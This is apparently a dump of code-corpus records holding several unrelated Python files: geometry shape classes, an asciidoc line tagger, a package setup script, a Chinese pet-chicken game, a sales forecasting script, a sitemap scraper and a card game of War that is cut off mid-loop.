polygons\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass Point():\r\n \"\"\"A class for points in Cartesian coordinate systems.\"\"\"\r\n def __init__(self, x=None, y=None, key=None):\r\n self.x, self.y = x, y\r\n self.key = key\r\n def __getitem__(self, i):\r\n if i==0: return self.x\r\n if i==1: return self.y\r\n return None\r\n def __len__(self):\r\n return 2\r\n def __eq__(self, other):\r\n if isinstance(other, Point):\r\n return self.x==other.x and self.y==other.y\r\n return NotImplemented\r\n def __ne__(self, other):\r\n result = self.__eq__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n def __lt__(self, other):\r\n if isinstance(other, Point):\r\n if self.xother.x:\r\n return True\r\n elif self.x==other.x and self.y>other.y:\r\n return True\r\n return False\r\n return NotImplemented\r\n def __ge__(self, other):\r\n if isinstance(other, Point):\r\n if self > other or self == other:\r\n return True\r\n else:\r\n return False\r\n return False\r\n return NotImplemented\r\n def __le__(self, other):\r\n if isinstance(other, Point):\r\n if self < other or self == other:\r\n return True\r\n else:\r\n return False\r\n return False\r\n return NotImplemented\r\n def __str__(self):\r\n \"\"\"NAP: Not a point\"\"\"\r\n if self.x is None or self.y is None or not isinstance(self.x, (int, float)) or not isinstance(self.y, (int, float)):\r\n return 'NAP'\r\n if isinstance(self.x, (int)):\r\n fmtstr = '({0}, '\r\n else:\r\n fmtstr = '({0:.1f}, '\r\n if isinstance(self.y, (int)):\r\n fmtstr += '{1})'\r\n else:\r\n fmtstr += '{1:.1f})'\r\n return fmtstr.format(self.x, self.y)\r\n def __repr__(self):\r\n return self.__str__()\r\n def distance(self, other):\r\n return sqrt((self.x-other.x)**2 + (self.y-other.y)**2)\r\n def draw(self,color):\r\n plt.plot(self.x,self.y,color=color,marker='.')\r\n def above(self,other):\r\n return self.y>other.y\r\n\r\n\r\n\r\n## Two statuses of the left endpoint\r\nENDPOINT = 0 ## original left endpoint\r\nINTERIOR = 1 ## interior in the segment\r\n\r\nclass Segment:\r\n \"\"\"\r\n A class for line segments.\r\n \"\"\"\r\n def __init__(self, e, p0, p1, c=None):\r\n \"\"\"\r\n Constructor of Segment class.\r\n Input\r\n e: segment ID, an integer\r\n p0, p1: endpoints of segment, Point objects\r\n \"\"\"\r\n if p0>=p1:\r\n p0,p1 = p1,p0 # p0 is always left\r\n self.edge = e # ID, in all edges\r\n self.lp = p0 # left point\r\n self.lp0 = p0 # original left point #*@\\label{lineseg:lp0}\r\n self.rp = p1 # right point\r\n self.status = ENDPOINT # status of segment\r\n self.c = c # c: feature ID\r\n def __eq__(self, other):\r\n if isinstance(other, Segment):\r\n return (self.lp==other.lp and self.rp==other.rp)\\\r\n or (self.lp==other.rp and self.rp==other.lp)\r\n return NotImplemented\r\n def __ne__(self, other):\r\n result = self.__eq__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n def __lt__(self, other): \r\n if isinstance(other, Segment):\r\n if self.lp and other.lp:\r\n lr = sideplr(self.lp, other.lp, other.rp)\r\n if lr == 0:\r\n lrr = sideplr(self.rp, other.lp, other.rp)\r\n if other.lp.x < other.rp.x:\r\n return lrr > 0\r\n else:\r\n return lrr < 0\r\n else:\r\n if other.lp.x > other.rp.x:\r\n return lr < 0\r\n else:\r\n return lr > 0\r\n return NotImplemented\r\n def __gt__(self, other):\r\n result = self.__lt__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n def __repr__(self):\r\n return \"{0}\".format(self.edge)\r\n def contains(self, p):\r\n \"\"\"\r\n Returns none zero if segment has p as an endpoint\r\n \"\"\"\r\n if self.lp == p:\r\n return -1\r\n elif self.rp == p:\r\n return 1\r\n else:\r\n return 0\r\n def lowerpoint(self):\r\n if self.lp.yself.rp.y:\r\n return self.lp\r\n else:\r\n return self.rp\r\n \r\n\r\nclass Vertex(Point):\r\n def __init__(self,x,y,key=None,ear=None,downward_cusp=False,upward_cusp=False,first_edge=None,second_edge=None,inters_edge_l=None,inters_edge_r=None,side=None):\r\n Point.__init__(self,x,y,key)\r\n self.ear=ear\r\n self.downward_cusp=downward_cusp\r\n self.upward_cusp=upward_cusp\r\n self.first_edge=first_edge\r\n self.second_edge=second_edge\r\n self.inters_edge_l=inters_edge_l\r\n self.inters_edge_r=inters_edge_r\r\n self.side=side\r\n \r\nclass Shape():\r\n def __init__(self,points,id=None,t=None):\r\n self.points=points\r\n self.id=id\r\n self.type=t\r\n def __len__(self):\r\n return len(self.points)\r\n def __repr__(self):\r\n return str(self.points)\r\n def __iter__(self):\r\n return iter(self.points)\r\n def __delitem__(self,i):\r\n index=i%len(self)\r\n del self.points[index]\r\n def __getitem__(self,i):\r\n index=i%len(self)\r\n return self.points[index]\r\n def append(self,point):\r\n return self.points.append(point)\r\n def pop(self):\r\n self.points.pop()\r\n def index(self,point):\r\n return self.points.index(point)\r\n \r\n \r\nclass Polyline(Shape):\r\n def __init__(self,points,color='grey',id=None,name=None):\r\n Shape.__init__(self,points,id,\"polyline\")\r\n self.name=name\r\n self.color=color\r\n def draw(self):\r\n line_xcoord=[point.x for point in self.points]\r\n line_ycoord=[point.y for point in self.points]\r\n plt.plot(line_xcoord,line_ycoord,color=self.color)\r\n\r\n\r\nclass Polygon(Shape):\r\n def __init__(self,points,edgecolor='grey',fillcolor='white',id=None,name=None):\r\n Shape.__init__(self,points,id,\"polygon\")\r\n self.name=name\r\n self.fillcolor=fillcolor\r\n self.edgecolor=edgecolor\r\n \r\n def area(self):\r\n numvert=len(self)\r\n A=0\r\n for i in range(numvert):\r\n ai=self[i].x*self[i+1].y-self[i+1].x*self[i].y\r\n A=A+ai\r\n A=A/2.0\r\n return A\r\n\r\n def centroid(self):\r\n numvert=len(self)\r\n A=0\r\n xmean=0\r\n ymean=0\r\n for i in range(numvert):\r\n ai=self[i].x*self[i+1].y-self[i+1].x*self[i].y\r\n A=A+ai\r\n xmean=xmean+(self[i].x+self[i+1].x)*ai\r\n ymean=ymean+(self[i].y+self[i+1].y)*ai \r\n C=Point(xmean/(3*A),ymean/(3*A))\r\n return C\r\n \r\n def edge_list(self):\r\n edge_list=[]\r\n n=len(self.points)\r\n for i in range(n-1):\r\n edge=Segment(i,self.points[i],self.points[i+1])\r\n edge_list=edge_list+[edge]\r\n edge=Segment(n-1,self.points[n-1],self.points[0])\r\n edge_list=edge_list+[edge]\r\n return edge_list\r\n \r\n def incident_edges(self,vertex):\r\n return [edge for edge in self.edge_list() if vertex==edge.rp or vertex==edge.lp]\r\n \r\n def draw(self):\r\n poly_xcoord=[point.x for point in self.points]\r\n poly_ycoord=[point.y for point in self.points]\r\n plt.fill(poly_xcoord,poly_ycoord,closed=True,fill=True,\r\n facecolor=self.fillcolor,\r\n edgecolor=self.edgecolor,alpha=0.5)\r\n \r\n","sub_path":"shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364873420","text":"import os\nimport sys\nimport glob\n\n\nVALID_TAGS = tuple('natural caption blank_line attribute source_header block_header code anchor image_link'.split() +\n 'block_start block_end code_start code_end natural_start natural_end'.split() +\n ['heading{}'.format(i) for i in range(1, 7)])\nINCLUDE_TAGS = ('natural', 'caption', 'heading1', 'heading2', 'heading3', 'heading4', 'heading5')\n\n\ndef get_lines(file_path):\n r\"\"\" Retrieve text lines from the manuscript Chapter*.asc and Appendix*.asc files\n\n Args:\n file_path (str): Path to directory containing manuscript asciidoc files\n i.e.: /Users/cole-home/repos/nlpinaction/manuscript/\n\n Returns:\n list of lists of str, one list for each Chapter or Appendix\n \"\"\"\n path = os.path.join(file_path, 'Chapter*')\n files = glob.glob(path)\n lines = []\n for file in files:\n with open(file, 'r') as f:\n lines.append(f.readlines())\n\n path = os.path.join(file_path, 'Appendix*')\n files = glob.glob(path)\n for file in files:\n with open(file, 'r') as f:\n lines.append(f.readlines())\n return lines\n\n\ndef tag_lines(lines):\n r\"\"\" Naively tags lines from manuscript with: code, natural, heading, etc.\n\n Returns:\n list of tuples [(tag, line), ...]\n\n >>> VALID_TAGS\n ('natural',\n 'caption',\n 'blank_line',\n 'attribute',\n 'source_header',\n 'block_header',\n 'code',\n 'anchor',\n 'image_link',\n 'block_start',\n 'block_end',\n 'code_start',\n 'code_end',\n 'natural_start',\n 'natural_end',\n 'heading1',\n 'heading2',\n 'heading3',\n 'heading4',\n 'heading5',\n 'heading6')\n\n >>> tag_lines('|= Title| :chapter: 0|Hello|cruel world|==Heading Level 2| \\t| [source,bash]|====|$ grep this|====|'.split('|'))\n [('blank_line', ''),\n ('heading1', '= Title'),\n ('attribute', ':chapter: 0'),\n ('natural', 'Hello'),\n ('natural', 'cruel world'),\n ('heading2', '==Heading Level 2'),\n ('blank_line', ''),\n ('source_header', '[source,bash]'),\n ('block_start', '===='),\n ('code', '$ grep this'),\n ('block_end', '===='),\n ('blank_line', '')]\n \"\"\"\n current_block_type = None\n open_block = False\n block_terminator = None\n block_start = 0\n tup_lines = []\n for idx, line in enumerate(lines):\n normalized_line = line.lower().strip().replace(\" \", \"\")\n\n if not normalized_line:\n tag = 'blank_line'\n elif normalized_line[0] in r'/:':\n tag = 'attribute'\n elif normalized_line.startswith('[source'):\n current_block_type = 'code'\n block_start = idx\n open_block = True\n tag = 'source_header'\n elif normalized_line[:4] in ('[tip', '[not', '[imp', '[quo'):\n current_block_type = 'natural'\n block_start = idx\n open_block = True\n tag = 'block_header'\n elif open_block and idx == block_start + 1:\n if not normalized_line.startswith('--') and not normalized_line.startswith('=='):\n block_terminator = '\\n'\n tag = current_block_type\n else:\n block_terminator = normalized_line[:2]\n tag = (current_block_type or 'block') + '_start'\n elif open_block and normalized_line[:2] == block_terminator:\n current_block_type = None\n open_block = False\n block_terminator = None\n block_start = 0\n tag = (current_block_type or 'block') + '_end'\n elif open_block and current_block_type == 'code':\n tag = 'code'\n elif normalized_line.startswith('='):\n tag = 'heading'\n tag += str(len([c for c in normalized_line if c == '=']))\n elif normalized_line.startswith('.'):\n tag = 'caption'\n elif normalized_line.startswith('image:'):\n tag = 'image_link'\n elif normalized_line.startswith('[['):\n tag = 'anchor'\n else:\n tag = 'natural'\n current_block_type = None\n\n tup_lines.append((tag, line.strip()))\n\n return tup_lines\n\n\ndef main(book_dir='.',\n include_tags=INCLUDE_TAGS,\n verbose=True):\n sections = [tag_lines(section) for section in get_lines(book_dir)]\n if verbose:\n for section in sections:\n for line in section:\n if line[0] in include_tags:\n print(line[1])\n return sections\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n book_dir = os.path.curdir\n if args:\n book_dir = args[0]\n include_tags = ['natural']\n if len(args) > 1:\n include_tags = list(args[1:])\n # print('Parsing Chapters and Appendices in: ' + book_dir)\n # print('***PRINTING LINES WITH TAGS***: ' + str(include_tags))\n main(book_dir=book_dir, include_tags=include_tags, verbose=True)\n","sub_path":"src/nlpia/book_parser.py","file_name":"book_parser.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"638761501","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nVERSION = '0.3.8'\n\nsetup(\n name='kamonohashi-cli',\n version=VERSION,\n description='KAMONOHASHI Command Line Interface',\n long_description='Python command line interface for KAMONOHASHI https://kamonohashi.ai/',\n author='NS Solutions Corporation',\n author_email='kamonohashi-support@jp.nssol.nssmc.com',\n url='https://github.com/KAMONOHASHI/kamonohashi-cli',\n license='Apache License 2.0',\n packages=find_packages(),\n install_requires=[\n 'click',\n 'six >= 1.10',\n 'kamonohashi-sdk == 0.3.6',\n ],\n entry_points={\n 'console_scripts': ['kqi = cli.kqi:kqi_main']\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458053097","text":"import random\n\nclass Chicken(): #雞\n def __init__(self,Name,State,State_,Level,EXP,EXP_,HP,HP_,ATK,ATK_,DF,DF_,\n MP,MP_,Hunger,Emotion,Luck,Map,Point,Resistance,Day,Time):#Time一秒為2分鐘\n self.State = State\n self.State_ = State_\n self.Name = Name\n self.EXP = EXP\n self.EXP_ = EXP_\n self.Level = Level\n self.HP = HP\n self.HP_ = HP_ \n self.ATK = ATK\n self.ATK_ = ATK_\n self.DF = DF\n self.DF_ = DF_\n self.Hunger = Hunger\n self.Emotion = Emotion\n self.MP = MP\n self.MP_ = MP_\n self.Luck = Luck\n self.Map = Map\n self.Point = Point\n self.Resistance = Resistance\n self.Day = Day\n self.Time = Time\n def _State(self,i=0):\n if i==0:\n if self.Hunger <= 100: #怕程式碼太亂打的\n if 10 < self.Hunger <= 33:\n print('狀態: 有點餓了')\n if 0 < self.Hunger <= 10:\n self.State_[0] = 1\n print('狀態: 現在非常餓')\n if self.Hunger <= 0:\n print('狀態: 鬧飢荒咯! 生命值大幅降低')\n if self.State_[0] != 2:\n self.HP_ = int(self.HP_/2)\n self.State_[0] = 2\n if self.State_[0] == 1: #debug用\n if self.Hunger >= 33:\n self.State_[0] = 0\n if self.State_[0] == 2:\n if self.Hunger >= 33:\n print('狀態: 飢荒問題解決了...暫時...(生命上限回升)')\n oo = input(\"\")\n self.State_[0] = 0\n elif i==1:\n #體力值\n if self.MP_ <= self.MP:\n if self.MP/10 < self.MP_ <= self.MP/3:\n print('狀態: 有點累了')\n if 0 < self.MP_ <= self.MP/10:\n self.State_[1] = 1\n print('狀態: 真D累了')\n if self.MP_ <= 0:\n print('狀態: 你的雞累到沒力了 攻擊力大幅降低')\n if self.State_[1] != 2:\n self.ATK_ = int(self.ATK_/2)\n self.State_[1] = 2\n if self.State_[1] == 1: #debug用\n if self.MP_ >= self.MP/3:\n self.State_[1] = 0\n if self.State_[1] == 2:\n if self.MP_ >= self.MP/3:\n print('狀態: 休息夠了 你的雞願意繼續奮鬥了(攻擊力回升)')\n self.ATK_ = self.ATK\n self.State_[1] = 0\n elif i==2:\n #心情值\n if self.Emotion <= 100:\n if 10 < self.Emotion <= 33:\n print('狀態: 心情不太好')\n if 0 < self.Emotion <= 10:\n self.State_[2] = 1\n print('狀態: 心情頗遭(聽說是計概要被當了)')\n if self.Emotion <= 0:\n print('狀態: 人格分裂 出現疑似抖M傾向 防禦力大幅降低')\n if self.State_[2] != 2:\n self.DF_ = int(self.DF_/2)\n self.State_[2] = 2\n if self.State_[2] == 1: #debug用\n if self.Emotion >= 33:\n self.State_[2] = 0\n if self.State_[2] == 2:\n if self.Emotion >= 33:\n print('狀態: 人格分裂還沒有很嚴重 硬是救回來了(防禦力回升)')\n oo = input(\"\")\n self.DF_ = self.DF\n self.State_[2] = 0\n elif i==3:\n #生命值\n if self.HP_ <= self.HP:\n if self.HP/10 < self.HP_ <= self.HP/3 and self.State_[3] != 1:\n self.State_[3] = 1\n print(self.Name,'狀態: 的狀況不太優 請盡快進行治療')\n if 0 < self.HP_ <= self.HP/10 and self.State_[3] != 2:\n self.State_[3] = 2\n print('狀態: 當前血量十分危急 請盡速治療')\n if self.HP_ <= 0:\n self.HP_ = 0\n print(self.Name,' 與你的冒險就此終結 關於你傳奇的一生 沒人想知道','\\n'\n ,' R.I.P 願你的計概分數不會如此\\n')\n print(\"提示: 重新開啟後會讀入當天早上的存檔\")\n while 1:\n c = 8763\n if self.State_[3] == 1: #debug用\n if self.HP_ >= self.HP/3:\n self.State_[2] = 0\n if self.State_[3] == 2:\n if self.HP_ >= self.HP/3:\n print('狀態: 血量提升 感覺好多了')\n oo = input(\"\")\n self.State_[3] = 0\n elif i==4:\n #狀態語音\n print(\"\")\n if self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] == 0:\n self.State = '優良'\n elif 3 <= self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] <= 4:\n self.State = '不太優'\n print('你家的雞狀況不太優 自己注意嘿',end=\"\")\n oo = input(\"\")\n elif 3 < self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] <= 5:\n self.State = '很不優'\n print('你家的雞狀況真的很不優 有沒有在照顧阿?',end=\"\")\n oo = input(\"\")\n elif self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] == 6:\n self.State = '糟糕'\n print('你不怕可愛動物保護協會來找你?',end=\"\")\n oo = input(\"\")\n elif self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] >= 7:\n self.State = '難以理解'\n print('請停止虐雞 你的行為害我們得多打這串程式碼來提醒你 請別增加工作負擔 謝謝!',end=\"\")\n oo = input(\"\")\n if i==5:\n print(\"\")\n print(self.Name,' ','Level ',self.Level,'(',self.EXP_,'/',self.EXP,')'\n ,'\\n','HP: ','(',self.HP_,'/',self.HP,')',' ','ATK: ',self.ATK_,' ','DF: ',self.DF_,' '\n ,'\\n','飽食度: ','(',self.Hunger,'/100',')',' ','心情值: ','(',self.Emotion,'/100',')'\n ,' ','體力值: ','(',self.MP_,'/',self.MP,')','\\n','當前狀態: '\n ,self.State,' ','幸運值: ',self.Luck,' ','點數:',self.Point)\n print(\"\") \n def _Name(self,Name):\n self.Name = Name\n def _EXP(self,EXP):\n self.EXP_ += EXP\n if self.EXP_ >= self.EXP and self.Level < 50:\n self.EXP_ -= self.EXP\n self.EXP = int(self.EXP*1.09)\n if self.Level <= 10:\n self.Level += 1\n self.Point += 2\n self.MP += 2\n self.MP_ += 2\n elif 10 < self.Level <= 20:\n self.Level += 1\n self.Point += 2\n self.MP += 2\n self.MP_ += 2\n elif 20 < self.Level <= 30:\n self.Level += 1\n self.Point += 3\n self.MP += 2\n self.MP_ += 2\n elif 30 < self.Level <= 40:\n self.Level += 1\n self.Point += 3\n self.MP += 2\n self.MP_ += 2\n elif 40 < self.Level < 50:\n self.Level += 1\n self.Point += 4\n print(self.Name,\"升級了\",end = \"\")\n oo = input(\"\")\n if self.Level == 10:\n self.ATK += 5\n self.ATK_ += 5\n self.HP += 50\n self.HP_ += 50\n self.DF += 5\n self.DF_ += 5\n self.Luck += 2\n elif self.Level == 20:\n self.ATK += 7\n self.ATK_ += 7\n self.HP += 75\n self.HP_ += 75\n self.DF += 7\n self.DF_ += 7\n self.Luck += 2\n elif self.Level == 30:\n self.ATK += 9\n self.ATK_ += 9\n self.HP += 100\n self.HP_ += 100\n self.DF += 9\n self.DF_ += 9\n self.Luck += 2\n elif self.Level == 40:\n self.ATK += 12\n self.ATK_ += 12\n self.HP += 150\n self.HP_ += 150\n self.DF += 12\n self.DF_ += 12\n self.Luck += 2\n elif self.Level == 50:\n self.ATK += 15\n self.ATK_ += 15\n self.HP += 200\n self.HP_ += 200\n self.DF += 15\n self.DF_ += 15\n self.Luck += 2\n\n print(\"\")\n def _HP(self,HP):\n self.HP_ += HP\n if self.HP_ > self.HP and self.State_[0] == 0:\n self.HP_ = self.HP\n if self.HP_ > self.HP/2 and self.State_[0] == 2:\n self.HP_ = int(self.HP/2)\n def _ATK(self,ATK):\n self.ATK_ += ATK\n if self.ATK_ > self.ATK and self.State_[1] == 0:\n self.ATK_ = self.ATK\n if self.ATK_ > self.ATK/2 and self.State_[1] == 2:\n self.ATK_ = int(self.ATK/2)\n def _DF(self,DF):\n self.DF_ += DF\n if self.DF_ > self.DF and self.State_[2] == 0:\n self.DF_ = self.DF\n if self.DF_ > self.DF/2 and self.State_[2] == 2:\n self.DF_ = int(self.DF/2)\n def _Hunger(self,Hunger):\n self.Hunger += Hunger\n if self.Hunger > 100:\n self.Hunger = 100\n if self.Hunger < 0:\n self.Hunger = 0\n def _MP(self,MP):\n self.MP_ += MP\n if self.MP_ > self.MP:\n self.MP_ = self.MP\n if self.MP_ <= 0:\n self.MP_ = 0\n def _Emotion(self,Emotion):\n self.Emotion += Emotion\n if self.Emotion > 100:\n self.Emotion = 100\n if self.Emotion < 0:\n self.Emotion = 0\n def Add_Time(self,Time):\n self.Time += Time\n if self.Time >= 720:\n self.Day += 1\n self.Time -= 720\n if self.Time-Time < 690 <= self.Time and self.Day>=2:\n print(\"時間太晚了\",self.Name,\"心情值降低\")\n self._Emotion(-15)\n print(\"心情值減少15\",end=\"\")\n oo = input(\"\")\n if self.Time-Time < 630 <= self.Time:\n print(\"時間有點晚搂 要回去睡覺了\")\n oo = input(\"\")\n if (self.Time-Time < 660 <= self.Time or\n self.Time-Time < 600 <= self.Time or\n self.Time-Time < 530 <= self.Time or\n self.Time-Time < 470 <= self.Time or\n self.Time-Time < 410 <= self.Time or\n self.Time-Time < 350 <= self.Time or\n self.Time-Time < 290 <= self.Time or\n self.Time-Time < 230 <= self.Time) and self.Day>=2:\n p = self.Hunger - 2\n if p < 0:\n self.Hunger = 0\n else:\n self.Hunger = p\n def Now_Time(self):\n print(\"現在的時間是: \")\n print(\"第\",self.Day,\"天 \",int(self.Time/30),\"點\",self.Time%30,\"分\",sep = \"\")\n","sub_path":"Asset/Chicken_System.py","file_name":"Chicken_System.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346093843","text":"import numpy as np\nimport pandas as pd\nfrom model.ets.ets import holtWinters\nfrom pyecharts import Line\n\ndf=pd.read_csv(\"../data/sales.csv\",header=None)\nmonths=23\ndf.columns=['timestamp','sales']\ncolumns_pre=df.timestamp.values[-months:]\ndf_pre=pd.DataFrame(np.zeros((months,months)))\ndf_pre.columns=columns_pre\ndf_pre[\"add1\"]=0\ndf_pre['add2']=0\ndf_pre[\"add3\"]=0\n\nfor i in range(df.shape[0]-months,df.shape[0]):\n tsA=df.iloc[0:i,1]\n \n result_ets=holtWinters(tsA, 12, 2, 4, mtype = 'additive')\n #result_ets=holtWinters(tsA, 12, 4, 4, mtype = 'other')\n result_ets2=np.round(list(result_ets['predicted']),2)\n print(i,tsA,result_ets2)\n \n begin_num=(i+months-df.shape[0])\n try:\n df_pre.iloc[begin_num,begin_num:begin_num+4]=result_ets2\n #df_pre.iloc[begin_num,begin_num:begin_num+4]=[1,1,1,1]\n except Exception as e:\n print('报错')\n \n \ndf_plot=df_pre.iloc[:,3:-3]\nlist_pre1=[]\nlist_pre2=[]\nlist_pre3=[]\nlist_pre4=[]\nfor j in range(0,df_plot.shape[1]):\n list_pre1.append(df_plot.iloc[j,j])\n list_pre2.append(df_plot.iloc[j+1,j])\n list_pre3.append(df_plot.iloc[j+2,j])\n list_pre4.append(df_plot.iloc[j+3,j])\n\n \ndate_all=df.timestamp[df.shape[0]-months+3:]\nsales_real= df.sales[df.shape[0]-months+3:]\n\ndate_pre=df_plot.columns\nsales1=list_pre1\nsales2=list_pre2\nsales3=list_pre3\nsales4=list_pre4\n\nline = Line(\"空调销售预测\")\nline.add(\"实际销量结果\", date_all, sales_real,line_color='black',line_width=2)\n\n#line.add(\"第一次预测结果\", date_pre, sales1,line_type='dashed',line_color='green')\n#line.add(\"第二次预测结果\", date_pre, sales2,line_type='dashed',line_color='green')\n#line.add(\"第三次预测结果\", date_pre, sales3,line_type='dashed',line_color='green')\nline.add(\"第四次预测结果\", date_pre, sales4,line_type='dashed',line_color='green')\n#line.add(\"python版arima预测结果\",date_pre,sales_arima_python,line_type='dashed',line_color='red',line_width=2)\n#line.add(\"商家B\", attr, v2, is_smooth=True,mark_line=[\"max\", \"average\"])\nline.render('../data/python_ets.html')\n'''\nresults1 = holtWinters(tsA, 12, 4, 4, mtype = 'additive')\nresults2 = holtWinters(tsA, 12, 4, 4, mtype = 'multiplicative')\n\nprint(\"TUNING: \", results1['alpha'], results1['beta'], results1['gamma'], results1['MSD'])\nprint(\"FINAL PARAMETERS: \", results1['params'])\nprint(\"PREDICTED VALUES: \", results1['predicted'])\n'''\n","sub_path":"scripts/run_python_ets.py","file_name":"run_python_ets.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367529769","text":"# -*- coding: utf-8 -*-\n\nimport urllib2\nfrom xml.dom import minidom\n\nfrom task import Task\nfrom sqlexecutor import SqlExecutor\n\n\nclass ImportGomeData(Task):\n\n def __init__(self, cfg):\n super(ImportGomeData, self).__init__(cfg)\n\n #self.__sqle = SqlExecutor(cfg['db_args'])\n\n def suck(self):\n if self._cfg['datasource']['index']:\n idx = self.__get_index(self._cfg['datasource']['index'])\n for loc in idx:\n self._logger.debug(loc)\n products = self.__get_products(loc)\n #data = []\n\n #try:\n # data = self.__capture()\n #except Exception as e:\n # self._send_error_msg('Capturing qingpai.t_light failed.\\n%s' % e)\n\n #self._logger.info('[%d] data captured.' % len(data))\n #self._logger.debug('%s' % data)\n\n #if not data:\n # return\n\n #for rec in data:\n # self._logger.info('[app_id]: %s [xml_url]: %s [update_frequency]: %s [last_updated_time]: %s' % (rec[0], rec[1], rec[2], rec[3]))\n\n # if self.__should_send(rec[2], rec[3]):\n # ret = self.__send({ 'appid': rec[0], 'xmlurl': rec[1] })\n # self._logger.info(ret)\n # else:\n # self._logger.info('skipped')\n\n def die(self):\n try:\n #self.__sqle.close()\n\n super(ImportGomeData, self).die()\n except Exception as e:\n self._logger.error('ImportGomeData:die(): %s\\n' % e)\n\n def __get_index(self, url):\n retval = []\n\n xml = urllib2.urlopen(url)\n if xml.getcode() == 200:\n dom = minidom.parseString(xml.read().decode('utf-8'))\n sms = dom.documentElement.getElementsByTagName('sitemap')\n for sm in sms:\n loc = sm.getElementsByTagName('loc')[0].childNodes[0].nodeValue\n retval.append(loc)\n\n return retval\n\n def __get_products(self, url):\n retval = []\n\n xml = urllib2.urlopen(url)\n if xml.getcode() == 200:\n dom = minidom.parseString(xml.read().decode('utf-8'))\n products = dom.documentElement.getElementsByTagName('url')\n for p in products:\n pdata = {}\n pdata['ad_url'] = p.getElementsByTagName('jumploc')[0].childNodes[0].nodeValue\n pdata['ad_desc'] = p.getElementsByTagName('title')[0].childNodes[0].nodeValue\n pdata['image_url'] = p.getElementsByTagName('image')[0].childNodes[0].nodeValue\n pdata['image_keywords'] = p.getElementsByTagName('keywords')[0].childNodes[0].nodeValue\n self._logger.debug(pdata)\n retval.append(pdata)\n\n return retval\n","sub_path":"worker/qp_stat_report/tasks/import_gome_data.py","file_name":"import_gome_data.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"420518629","text":"# Ben Jordan\r\n# 12/9/2020\r\n\r\nfrom random import shuffle\r\n# Only used to associate values\r\nvaluesdict = {'Two' : 2, 'Three' : 3, 'Four' : 4, 'Five' : 5, 'Six': 6,\r\n 'Seven': 7, 'Eight' : 8, 'Nine' : 9, 'Ten': 10, 'Jack': 11, \r\n 'Queen': 12, 'King' : 13, 'Ace' : 14}\r\n\r\n# create card instances\r\nsuits = [ \"Hearts\", \"Clubs\", \"Spades\", \"Diamonds\"]\r\nranks = list(valuesdict.keys())\r\n\r\n# create card class\r\nclass Card:\r\n \r\n def __init__(self, suit, rank):\r\n self.suit = suit\r\n self.rank = rank.title()\r\n self.value = valuesdict[self.rank]\r\n \r\n def __str__(self):\r\n return self.rank + \" of \" + self.suit\r\nclass Deck:\r\n \r\n def __init__(self):\r\n \r\n self.all_cards = []\r\n \r\n for suit in suits:\r\n for rank in ranks:\r\n created_card = Card(suit, rank)\r\n self.all_cards.append(created_card)\r\n \r\n def shuffle(self):\r\n shuffle(self.all_cards)\r\n \r\n def deal_one(self):\r\n return self.all_cards.pop()\r\n\r\nclass Player:\r\n def __init__(self, name):\r\n self.name = name\r\n self.all_cards = []\r\n def remove_card(self):\r\n \r\n return self.all_cards.pop(0)\r\n \r\n def add_cards(self, new_cards):\r\n \r\n if type(new_cards) == type([]):\r\n self.all_cards.extend(new_cards)\r\n else:\r\n self.all_cards.append(new_cards)\r\n \r\n def __str__(self):\r\n return f' Player {self.name} has {len(self.all_cards)} cards.'\r\n\r\n#Game Logic\r\n\r\n# create two players\r\nplayer1 = Player('One')\r\nplayer2 = Player('Two')\r\n\r\n# Create new deck\r\nnew_deck = Deck()\r\n # shuffle\r\nnew_deck.shuffle()\r\n# split deck between each player\r\n\r\nfor x in range(26):\r\n player1.add_cards(new_deck.deal_one())\r\n player2.add_cards(new_deck.deal_one())\r\n\r\n# check to see if anybody has won/lost (0 cards)\r\n# while game_on is true\r\nround_num = 0\r\ngame_on = True\r\neachwar = 15\r\n\r\nwhile game_on:\r\n round_num += 1\r\n print(f'Round {round_num}')\r\n \r\n if len(player1.all_cards) == 0:\r\n print(\"Player 2 wins!\")\r\n game_on = False\r\n break\r\n if len(player2.all_cards) == 0:\r\n print(\"Player 1 wins!\")\r\n game_on = False\r\n break\r\n player_1_cards = []\r\n player_1_cards.append(player1.remove_card())\r\n player_2_cards = []\r\n player_2_cards.append(player2.remove_card())\r\n war = True\r\n while war:\r\n if player_1_cards[-1].value > player_2_cards[-1].value:\r\n player1.add_cards(player_1_cards) \r\n player1.add_cards(player_2_cards)\r\n war = False\r\n elif player_1_cards[-1].value < player_2_cards[-1].value:\r\n player2.add_cards(player_1_cards) \r\n player2.add_cards(player_2_cards)\r\n \r\n war = False\r\n else: \r\n print('WAR!')\r\n if len(player1.all_cards) < eachwar:\r\n print('Player One unable to declare war.')\r\n print('Player Two Wins!')\r\n game_on = False\r\n war = False\r\n elif len(player2.all_cards) < eachwar:\r\n print('Player Two unable to declare war.')\r\n print('Player One Wins!')\r\n game_on = False\r\n war = False\r\n else:\r\n for num in range(eachwar):\r\n player_1_cards.append(player1.remove_card())\r\n 